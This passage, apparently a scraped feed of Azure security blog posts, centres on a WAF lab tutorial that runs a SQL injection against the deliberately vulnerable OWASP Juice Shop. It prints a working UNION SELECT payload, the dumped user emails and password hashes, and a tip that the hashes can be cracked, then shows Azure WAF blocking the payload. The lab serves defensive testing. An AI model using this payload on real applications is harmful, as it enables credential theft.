to:</STRONG></P> <P><STRONG>@</STRONG><EM>Nyler Gaskins for GitHub assets and testing and reviewing this post</EM></P> <P><EM><LI-USER uid="356371"></LI-USER> Kapila for testing and reviewing the post</EM></P> <P><EM><LI-USER uid="69313"></LI-USER> for how to find the WVD data plane communication technique</EM></P> Tue, 27 Apr 2021 15:39:52 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/how-to-use-azure-firewall-premium-with-wvd/ba-p/2148402 Nathan Swift 2021-04-27T15:39:52Z Part 4 - Data Disclosure and Exfiltration Playbook: Azure WAF Security Protection and Detection Lab https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-4-data-disclosure-and-exfiltration-playbook-azure-waf/ba-p/2031269 <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">Tutorial: Data Disclosure and Exfiltration Playbook</FONT></H2> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>The last tutorial in this four-part series for Azure WAF protection is the data exfiltration playbook.&nbsp; The purpose of the Azure WAF security protection lab is to demonstrate <STRONG>Azure WAF</STRONG>'s capabilities in identifying and protecting against suspicious activities and potential attacks against your web applications.&nbsp; This playbook explains how to test Azure WAF's protections against a <STRONG>SQL Injection (SQLi)</STRONG> <STRONG>attack</STRONG> with emphasis on Azure WAF protection ruleset and logging capabilities.&nbsp; The lab does not include advanced application security concepts and is not intended to be a reference for application security testing as these areas are broader than the use cases demonstrated herein.</P> <P>&nbsp;</P> <P>This playbook demonstrates the protection capabilities of Azure WAF against a simulated SQL Injection attack from common, real-world, publicly available hacking and attack tools.</P> <P>&nbsp;</P> <P>In this tutorial you will:</P> <OL> <LI>Simulate SQL Injection (SQLi) attack against the target OWASP Juice Shop application directly and then attack the same instance of the web application published through Azure WAF</LI> <LI>Observe the difference in the web application behavior in the two scenarios</LI> <LI>Review the summarized logs in the WAF Workbook (<A href="#" target="_blank" rel="noopener">Azure Monitor Workbook for WAF</A>)</LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Prerequisites</H2> <P>&nbsp;</P> <OL> <LI><A title="Setup an Azure WAF Attack Testing Lab" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-1-lab-setup-azure-web-application-firewall-security/ba-p/2030469" target="_blank" rel="noopener">A completed Azure WAF security lab setup</A><BR /> <UL> <LI>We recommend following the lab setup instructions as closely as possible. The closer your lab is to the suggested lab setup, the easier it will be to follow the Azure ATP testing procedures.</LI> </UL> </LI> <LI><A title="Reconnaissance Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-2-reconnaissance-playbook-azure-waf-security-protection-and/ba-p/2030751" target="_blank" rel="noopener">Completion of the reconnaissance playbook tutorial</A></LI> <LI><A title="Vulnerability Exploitation Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-3-vulnerability-exploitation-playbook-azure-waf-security/ba-p/2031047" target="_blank" rel="noopener">Completion of the vulnerability exploitation playbook tutorial</A></LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Configuring Burp Suite and Firefox</H3> <P>&nbsp;</P> <P>Before you being, please refer to the <STRONG>Configuring Burp Suite and Firefox</STRONG> section in the previous tutorial, <A title="Vulnerability Exploitation Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-3-vulnerability-exploitation-playbook-azure-waf-security/ba-p/2031047" target="_blank" rel="noopener">Vulnerability Exploitation Playbook</A>&nbsp;to setup Burp Suite and the Firefox web browser on the Kali VM.</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Sensitive Data Exposure and Exfiltration</H2> <P>&nbsp;</P> <P>In this phase, the attacker is ready to use a vulnerability they have previously discovered, tested, and developed further to achieve their objective to access and exfiltrate data.&nbsp; In this playbook, we will perform a SQL Injection attack to disclose and then exfiltrate the list of all user credentials in the OWASP Juice Shop application.</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Performing SQL Injection against the Target Web Application</H2> <P>&nbsp;</P> <P>In this tutorial, you will perform a SQL Injection (SQLi) attack against the OWASP Juice Shop application two times.&nbsp;</P> <P>&nbsp;</P> <OL> <LI><STRONG>Scenario 1</STRONG>: Performing SQL injection in the target web application directly</LI> <LI><STRONG>Scenario 2</STRONG>: Performing the same injection in the same target web application protected by Azure WAF on Application Gateway</LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Scenario 1:&nbsp; Performing SQL Injection when going to the OWASP Juice Shop Application directly</H3> <P>&nbsp;</P> <OL> <LI>Sign into the Kali VM using your lab credentials</LI> <LI>Launch Burp Suite and ensure you have Burp Suite configured and running as described in the <STRONG>Configuring Burp Suite and Firefox </STRONG>section of the <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-3-vulnerability-exploitation-playbook-azure-waf-security/ba-p/2031047" target="_blank" rel="noopener">Vulnerability Exploitation Playbook</A></LI> <LI>Using Firefox, browse directly to the Juice Shop site by going to <SPAN>http://owaspdirect-&lt;deployment</SPAN> guid&gt;.azurewebsites.net</LI> <LI>In Burp Suite, check the <STRONG>Proxy --&gt; HTTP history</STRONG> tab for the request and response data for this website</LI> <LI>In the search bar on the Juice Shop website, type "apple" and examine the request and response in Burp Suite</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609802434105.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244123i7FFCB7BEA0286BE3/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609802434105.png" alt="Mohit_Kumar_0-1609802434105.png" /></span></P> <P class="lia-indent-padding-left-30px"><FONT size="2"><FONT color="#FF0000"><STRONG>!</STRONG></FONT><STRONG> IMPORTANT</STRONG>: &nbsp;For the scenarios demonstrated in this document, OWASP Juice Shop application was running on HTTP port 3000.&nbsp; This is not the case when you use the Azure WAF Attack Testing Lab Deployment Template as it configures the application to run on port 80, 443 and assigns it a URL.&nbsp; For the lab tutorials, you will connect to the application on HTTP port 80 only.&nbsp; The URL for the application will be <SPAN>http://owaspdirect-&lt;deployment</SPAN> guid&gt;.azurewebsites.net.&nbsp; &lt;deployment guid&gt; is unique to every deployment</FONT></P> <P>&nbsp;</P> <OL start="6"> <LI>We see that when searching, the client makes a connection to the <STRONG>/rest/products/search</STRONG> endpoint</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609802546363.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244124iA2B4AC4796C9A28E/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609802546363.png" alt="Mohit_Kumar_1-1609802546363.png" /></span></P> <P>&nbsp;</P> <OL start="7"> <LI>The&nbsp;<STRONG>/rest/products/search&nbsp;</STRONG>endpoint&nbsp;of the&nbsp;<STRONG>OWASP Juice Shop</STRONG>&nbsp;application is vulnerable to SQL injection.&nbsp; In this tutorial, we will be exploiting the SQLi vulnerability in this endpoint</LI> <LI>To exploit the SQLi vulnerability in the <STRONG>/rest/products/search </STRONG>endpoint, we will use Burp Suite's Repeater functionality to inject a specifically crafted SQL query in the request to this endpoint</LI> <LI>To do this, right click one of the GET requests to the <STRONG>/rest/products/search </STRONG>endpoint and then click <STRONG>Send to Repeater</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Figure 1 - Send Request to Burp Repeater</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><STRONG><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609804509315.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244136i736F2AA445C15334/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609804509315.png" alt="Mohit_Kumar_0-1609804509315.png" /></span></STRONG></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Figure 2 - Request in Burp Repeater</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><STRONG><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609804517809.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244137i8573A7C582B8D505/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609804517809.png" alt="Mohit_Kumar_1-1609804517809.png" /></span></STRONG></P> <P>&nbsp;</P> <OL start="10"> <LI>When ready to perform the injection, we will copy/paste and append the following encoded SQL query to the Request URI <STRONG>/rest/products/search?q=</STRONG> (as value to the query parameter) in the Burp Repeater window</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">a. URL encoded SQL query</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="sql">%71%77%65%72%74%27%29%29%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%69%64%2c%20%65%6d%61%69%6c%2c%20%70%61%73%73%77%6f%72%64%2c%20%27%34%27%2c%20%27%35%27%2c%20%27%36%27%2c%20%27%37%27%2c%20%27%38%27%2c%20%27%39%27%20%46%52%4f%4d%20%55%73%65%72%73%2d%2d </LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">b. Plain text SQL query (for reference)</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="sql">qwert')) UNION SELECT id, email, password, '4', '5', '6', '7', '8', '9' FROM Users-- </LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip:&nbsp;</STRONG>You can also append the plain text SQL query to the request URI, but it may fail in certain conditions</FONT></LI> </UL> <P>&nbsp;</P> <OL start="11"> <LI>After appending the encoded query to the request URI, as value to the to the query parameter, click&nbsp;<STRONG>Go</STRONG>&nbsp;<STRONG>(or Send button)</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609804755202.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244141iDFE5B6932BE2661E/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609804755202.png" alt="Mohit_Kumar_0-1609804755202.png" /></span></P> <P>&nbsp;</P> <OL start="12"> <LI>You should see a successful response from the OWASP Juice Shop application with details of all the users and their credentials disclosed by the web application.&nbsp; This indicates that our SQL injection attack was successful</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_2-1609804823459.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244143i31E0738E78D9C392/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_2-1609804823459.png" alt="Mohit_Kumar_2-1609804823459.png" /></span></P> <P>&nbsp;</P> <H5>JSON data in the response body</H5> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json">{"status":"success","data":[{"id":1,"name":"admin@juice-sh.op","description":"0192023a7bbd73250516f069df18b500","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":2,"name":"jim@juice-sh.op","description":"e541ca7ecf72b8d1286474fc613e5e45","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":3,"name":"bender@juice-sh.op","description":"0c36e517e3fa95aabf1bbffc6744a4ef","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":4,"name":"bjoern.kimminich@gmail.com","description":"6edd9d726cbdc873c539e41ae8757b8c","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":5,"name":"ciso@juice-sh.op","description":"861917d5fa5f1172f931dc700d81a8fb","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":6,"name":"support@juice-sh.op","description":"d57386e76107100a7d6c2782978b2e7b","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":7,"name":"morty@juice-sh.op","description":"f2f933d0bb0ba057bc8e33b8ebd6d9e8","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":8,"name":"mc.safesearch@juice-sh.op","description":"b03f4b0ba8b458fa0acdc02cdb953bc8","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":9,"name":"J12934@juice-sh.op","description":"3c2abc04e4a6ea8f1327d0aae3714b7d","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":10,"name":"wurstbrot@juice-sh.op","description":"9ad5b0492bbe528583e128d2a8941de4","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":11,"name":"amy@juice-sh.op","description":"030f05e45e30710c3ad3c32f00de0473","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":12,"name":"bjoern@juice-sh.op","description":"7f311911af16fa8f418dd1a3051d6810","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":13,"name":"bjoern@owasp.org","description":"9283f1b2e9669749081963be0462e466","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":14,"name":"chris.pike@juice-sh.op","description":"10a783b9ed19ea1c67c3a27699f0095b","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":15,"name":"accountant@juice-sh.op","description":"963e10f92a70b4b463220cb4c5d636dc","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":16,"name":"uvogin@juice-sh.op","description":"05f92148b4b60f7dacd04cceebb8f1af","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":17,"name":"demo","description":"fe01ce2a7fbac8fafaed7c982a04e229","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":18,"name":"john@juice-sh.op","description":"00479e957b6b42c459ee5746478e4d45","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":19,"name":"emma@juice-sh.op","description":"402f1c4a75e316afec5a6ea63147f739","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"}]}</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip</STRONG>: &nbsp;Data in the "Description" field in the server response is the password hash of the users which can be reversed using free tools available on the internet</FONT></LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Scenario 2:&nbsp; Performing SQL Injection when going to the OWASP Juice Shop Application through Azure WAF</H3> <P>&nbsp;</P> <P>You will now attempt to perform SQL Injection with the same query when going to the OWASP Juice Shop site through Azure WAF.</P> <P>&nbsp;</P> <OL> <LI>On Kali VM, launch a new instance of Burp Suite and the Firefox browser</LI> <LI>Using Firefox, browse to <A href="#" target="_blank" rel="noopener">http://juiceshopthruazwaf.com</A> and check the <STRONG>Proxy --&gt; HTTP history</STRONG> tab for the request and response data for this website in Burp Suite</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609804974511.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244144i834C8E07CBA7AB6F/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609804974511.png" alt="Mohit_Kumar_0-1609804974511.png" /></span></P> <P>&nbsp;</P> <OL start="3"> <LI>Search for "apple" in the search bar, find the request to the vulnerable <STRONG>/rest/products/search </STRONG>endpoint and send it to the Burp Repeater</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Send Request to Burp Repeater</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609805057439.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244145i2B47FB312848CC0F/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609805057439.png" alt="Mohit_Kumar_0-1609805057439.png" /></span></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Request in Burp Repeater</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_2-1609805081885.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244147iB3C58AA5E92A2D6E/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_2-1609805081885.png" alt="Mohit_Kumar_2-1609805081885.png" /></span></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <OL start="4"> <LI>Append the encoded SQL query (from Step 10 in Scenario 1 above) as value to the query parameter in the Burp Repeater and click <STRONG>Go (or Send)</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_3-1609805127593.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244148i1A13B29B67792A58/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_3-1609805127593.png" alt="Mohit_Kumar_3-1609805127593.png" /></span></P> <P>&nbsp;</P> <OL start="5"> <LI>Upon examining the response, we find that the request was blocked by Azure WAF on Application Gateway</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_4-1609805146293.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244149iACCF7C506B1E7679/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_4-1609805146293.png" alt="Mohit_Kumar_4-1609805146293.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Understanding What Happened</H2> <P>&nbsp;</P> <P>Upon reviewing the HTTP requests and responses for the two attempts to perform SQL Injection in the same instance of the Juice Shop application, we see the pattern as shown in the below table.&nbsp; This clearly indicates that the potentially malicious payload which could otherwise be stored in the application is not allowed through by Azure WAF.</P> <P>&nbsp;</P> <TABLE border="1" width="99.86187845303866%"> <TBODY> <TR> <TD width="66.85082872928176%" height="30px"> <P><STRONG>SQL Injection Route</STRONG></P> </TD> <TD width="33.011049723756905%" height="30px" class="lia-align-center"> <P><STRONG>Success</STRONG></P> </TD> </TR> <TR> <TD width="66.85082872928176%" height="30px"> <P>Direct</P> </TD> <TD width="33.011049723756905%" height="30px" class="lia-align-center"> <P>Yes</P> </TD> </TR> <TR> <TD width="66.85082872928176%" height="30px"> <P>Through WAF</P> </TD> <TD width="33.011049723756905%" height="30px" class="lia-align-center"> <P>No</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>Now let us use the <A title="Azure Monitor Workbook for WAF" href="#" target="_blank" rel="noopener">Azure Monitor Workbook for WAF</A> to understand how the WAF handled traffic with the <STRONG>SQL Injection </STRONG>query.&nbsp; This workbook visualizes security relevant WAF events across several filterable panels.&nbsp; <EM>It works with all WAF types, including Application Gateway, Front Door, and CDN, and can be filtered based on WAF type or a specific WAF instance.</EM></P> <P>&nbsp;</P> <P><A title="Deploy Azure Monitor Workbook for WAF" href="#" target="_blank" rel="noopener">Click here</A> to deploy <STRONG>Azure Monitor Workbook for WAF</STRONG> to your subscription in Azure.</P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip</STRONG>:&nbsp; To understand what is happening when traffic with SQL Injection query destined for the Juice Shop application goes through the Azure WAF, you can also examine the log entries associated with <STRONG>ApplicationGatewayFirewallLog</STRONG> in the <STRONG>Azure Monitor</STRONG></FONT></LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <H3><FONT size="3">Reviewing WAF logs in the Workbook</FONT></H3> <P>&nbsp;</P> <OL> <LI>You can access the WAF workbook by going into the Workbook blade and then selecting the WAF workbook deployed for this testing.&nbsp; Once in the workbook, ensure that you have selected the appropriate <STRONG>Time Range</STRONG>, <STRONG>WAF Type and WAF Items</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609805295194.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244150i21F0E088684C7454/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609805295194.png" alt="Mohit_Kumar_0-1609805295194.png" /></span></P> <P>&nbsp;</P> <OL start="2"> <LI>You should also ensure that you have selected the correct Public IP address for your attacker machine (Kali VM) in the <STRONG>Top 10 Attacking IP Addresses, filter to single IP address </STRONG>pane</LI> </OL> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip</STRONG>:&nbsp; If you are using the Azure WAF Attack Testing Lab Environment Deployment Template and have followed the lab setup instructions then the client IP address will be the public IP address of the Azure Firewall in your demo environment</FONT></LI> </UL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609897377934.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244450i211CF3D97BF55518/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609897377934.png" alt="Mohit_Kumar_1-1609897377934.png" /></span></P> <P>&nbsp;</P> <OL start="3"> <LI>After selecting the correct client IP, we scroll back up to the top of the Workbook and review the visualizations at the top, in the WAF Workbook.&nbsp; Below are the sections of the workbook we will be using as numbered in the below figure</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">a. WAF actions filter</P> <P class="lia-indent-padding-left-60px">b. Top 40 Blocked Request URI addresses, filter to single URI address</P> <P class="lia-indent-padding-left-60px">c. Top 50 event trigger, filter by rule name</P> <P class="lia-indent-padding-left-60px">d. Message, full details</P> <P class="lia-indent-padding-left-60px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><SPAN><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_2-1609897428966.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244451iD3C422533E7D955E/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_2-1609897428966.png" alt="Mohit_Kumar_2-1609897428966.png" /></span></SPAN></P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Note</STRONG>:<STRONG>&nbsp; </STRONG>For a detailed overview of these sections of the WAF workbook, please refer to the<STRONG> Overview of the Workbook Sections</STRONG> in the prior tutorial, <SPAN><A title="Reconnaissance Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-2-reconnaissance-playbook-azure-waf-security-protection-and/ba-p/2030751" target="_self">Reconnaissance Playbook</A></SPAN></FONT></P> <P>&nbsp;</P> <OL start="4"> <LI>From the sliced data in the WAF workbook, we can see that two requests to the <STRONG>/rest/products/search</STRONG> URI were blocked by WAF.&nbsp; Upon reviewing the <STRONG>Top 50 event trigger, filter by rule name </STRONG>we see all the rules which evaluated the POC code in the request, the <STRONG>Message, full details </STRONG>section shows that the traffic was blocked by Mandatory rule because the Anomaly Score threshold was exceeded (<STRONG>Total Score: 43, SQLi=43</STRONG>) with SQL Injection attack being the closest match</LI> <LI>The below table shows an extract of the <STRONG>Top 50 event trigger, filter by rule name </STRONG>output for scanner traffic.&nbsp; This data shows that the WAF evaluated the encoded query in the HTTP request to detect that it was a SQL injection attack and therefore blocked it</LI> </OL> <P>&nbsp;</P> <TABLE> <TBODY> <TR> <TD width="550"> <P><STRONG>Rule</STRONG></P> </TD> <TD width="60"> <P><STRONG>count_</STRONG></P> </TD> </TR> <TR> <TD width="550"> <P>SQL Injection Attack Detected via libinjection</P> </TD> <TD width="53"> <P>1</P> </TD> </TR> <TR> <TD width="550"> <P>Detects MSSQL code execution and information gathering attempts</P> </TD> <TD width="53"> <P>1</P> </TD> </TR> <TR> <TD width="550"> <P>Looking for basic sql injection. Common attack string for mysql, oracle and others.</P> </TD> <TD width="53"> <P>1</P> </TD> </TR> <TR> <TD width="550"> <P>Detects MySQL comment-/space-obfuscated injections and backtick termination</P> </TD> <TD width="53"> <P>1</P> </TD> </TR> <TR> <TD width="550"> <P>Detects basic SQL authentication bypass attempts 2/3</P> </TD> <TD width="53"> <P>1</P> </TD> </TR> <TR> <TD width="550"> <P>Detects classic SQL injection probings 1/3</P> </TD> <TD width="53"> <P>1</P> </TD> </TR> <TR> <TD width="550"> <P>Detects classic SQL injection probings 2/3</P> </TD> <TD width="53"> <P>1</P> </TD> </TR> <TR> <TD width="550"> <P>SQL Injection Attack</P> </TD> <TD width="53"> <P>1</P> </TD> </TR> <TR> <TD width="551"> <P>Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)</P> </TD> <TD width="51"> <P>1</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Key Takeaway</H2> <P>&nbsp;</P> <P>SQL Injection (SQLi) is one of the most common type of application security vulnerability which allows an external adversary to exploit a vulnerable application to disclose and exfiltrate sensitive information in the application.</P> <P>&nbsp;</P> <P><STRONG>For web applications secured with it, Azure WAF can protect against SQL Injection (SQLi) attacks by detecting and blocking suspicious SQL queries at the network edge, with its out of the box ruleset.</STRONG></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <H4>Previous:&nbsp;<A title="Vulnerability Exploitation Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-3-vulnerability-exploitation-playbook-azure-waf-security/ba-p/2031047" target="_blank" rel="noopener">Vulnerability Exploitation Playbook</A></H4> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> Thu, 11 Feb 2021 21:27:16 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-4-data-disclosure-and-exfiltration-playbook-azure-waf/ba-p/2031269 Mohit_Kumar 2021-02-11T21:27:16Z Azure Network Security Proof of Concept Part 1: Planning https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-proof-of-concept-part-1-planning/ba-p/1746368 <H3>&nbsp;</H3> <H3><FONT color="#000000"><STRONG>Overview</STRONG></FONT></H3> <P>Planning a network security Proof of Concept (<EM>POC) </EM>in your Azure environment is an effective way to understand the risk and potential exposure of a conceptual network design and how the services and tools available in Azure may be used for improvement. This is the first part of a series of steps to check in validating your conceptual design scenarios.</P> <P>&nbsp;</P> <P>At the end of this article, you will be able to put a process map on your POC, know the type of resources required and have an idea of the implementation strategy to use. Keep it simple.</P> <P>&nbsp;</P> <P>Azure network security involves mandatory and continuous improvement processes for workload protection. The effort to improve the network security posture of every client is a combination of both the Azure team and the customer-<A href="#" target="_blank" rel="noopener">shared responsibility in the cloud</A>. For more information, see the Azure <A href="#" target="_blank" rel="noopener">network&nbsp; security controls documentation</A>.</P> <P>Azure resources also have a <A href="#" target="_blank" rel="noopener">30-day trial access</A> that may be used to validate security with a POC. This is useful to note when making budgetary commitments.</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT color="#000000"><STRONG>Scope</STRONG></FONT></H2> <P>&nbsp;</P> <P>In this article, we discuss the <A href="#" target="_blank" rel="noopener">steps you should consider</A> when performing a security POC (Network, Container, Apps) to meet regulatory and compliance standards.</P> <P>&nbsp;</P> <P>When testing any tool, it will be necessary to determine what capabilities are expected, to achieve a good result. To get started, here are some scenarios that could benefit from layers of network security.</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="securityoptions.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/224283i440E5DAE2B056C56/image-size/large?v=v2&amp;px=999" role="button" title="securityoptions.png" alt="securityoptions.png" /></span></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">The different standards that guide the resources used by your service offerings such as NIST SP 800-53 R4, SWIFT CSP CSCF-v2020 and CIS, and how they align with <A href="#" target="_blank" rel="noopener">compliance</A>, should also be considered as you go along in the exercise.</P> <P class="lia-indent-padding-left-30px">Take advantage of <A href="#" target="_blank" rel="noopener">Azure Security Benchmark</A> to establish guardrails for your security configurations.</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H2 class="lia-indent-padding-left-30px"><FONT color="#000000">Understand your network</FONT></H2> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">As the network administrator/manager, having an adequate understanding of the layout of your network provides insight into the security requirements. The requirements for the different scenarios may be considered by keeping the focus on the objective of your test:</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-60px"><FONT color="#333333"><STRONG>Architecture</STRONG></FONT>: 